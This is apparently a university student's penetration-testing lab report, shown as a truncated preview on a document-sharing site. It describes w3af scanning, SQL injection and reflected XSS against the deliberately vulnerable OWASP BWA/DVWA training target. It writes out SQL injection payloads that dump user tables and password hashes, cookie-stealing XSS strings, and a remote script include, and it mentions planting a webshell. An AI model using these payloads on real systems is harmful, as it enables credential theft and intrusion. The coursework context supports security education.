Web应用程序渗透测试.doc
《Web应用程序渗透测试.doc》由会员分享,可在线阅读,更多相关《Web应用程序渗透测试.doc(32页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、Four short words sum up what has lifted most successful individuals above the crowd: a little bit more.-author-dateWeb应用程序渗透测试云南大学软件学院Web应用程序渗透测试姓名:滕召维 学号:13084139一、实验目的1. 学习使用OWASP BWA靶机。2. 学习使用Kali Linux进行Web应用程序渗透测试。二、实验内容1. 使用w3af漏洞扫描器对OWASP BWA靶机进行漏洞扫描。2. 根据老师的课堂讲授,按照课件相关内容在OWASP BWA靶机上实践XSS和SQ
2、L注入两种攻击。3. 配合使用Tamper Data和sqlmap进行sql注入攻击。4. 利用文件上传漏洞植入Webshell。三、主要实验结果(一)使用w3af漏洞扫描器对OWASP BWA靶机进行漏洞扫描1. 启动w3af漏洞扫描器。2. 编辑新建的Profile,也就是配置各种插件。对audit类插件勾选sqli和xss两个插件,如下图:对crawl类插件只勾选web_spider,如下图对web_spider的配置在窗口右侧,勾选only_forward并保存,如下图对output类插件,只勾选输出html文件。对输出文件的配置在窗口右侧,如下图输入文件名称并保存。这样扫描结果将保存
3、在/root/dvwa.html文件中。4. 如下图在Target一栏输入扫描的网址,单击右侧按钮start启动扫描。扫描过程中扫描结果(二) 在OWASP BWA靶机上实践XSS和SQL注入两种攻击1. 在Kali Linux攻击主机上,按照课件第29页,实践“通过SQL注入攻击绕过身份认证机制”。2. XSS和SQL注入攻击(1)在攻击机上访问 1. 的攻击方法,登录进入DVWA训练系统。(2)首先按照图示将DVWA应用的安全等级设置为Low。(3) 按照课件29-31页,实践SQL注入攻击。使用OWASP BWA靶机的DVWA应用程序演示如何获取后台数据库更多的信息。输入文件“XSS&S
4、QLi.txt”中的脚本。将数据表中的每一行都显示出来,输入: or 1=1查询INFORMATION_SCHEMA系统表,输入: UNION SELECT 1, table_name from INFORMATION_SCHEMA.tables - 列出user表的内容,输入: UNION SELECT 1, column_name from INFORMATION_SCHEMA.columns where table_name = users - 取得口令的MD5值,输入: UNION SELECT NULL, password from users - 使用concat()函数将所有的信
5、息都列出来,输入: UNION SELECT password, concat(first_name, , last_name, ,user) from users - (4)按照课件第40页,实践反射式XSS攻击。 输入 alert(Have funs)输入alert(document.cookie)(5) 按照课件第43页,访问访问Mutillidae的Cross Site Scripting (XSS)输入:xss.js的内容如下:document.write (This is remote text via xss.js located at ha.ckers.org + docume
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- Web 应用程序 渗透 测试
限制150内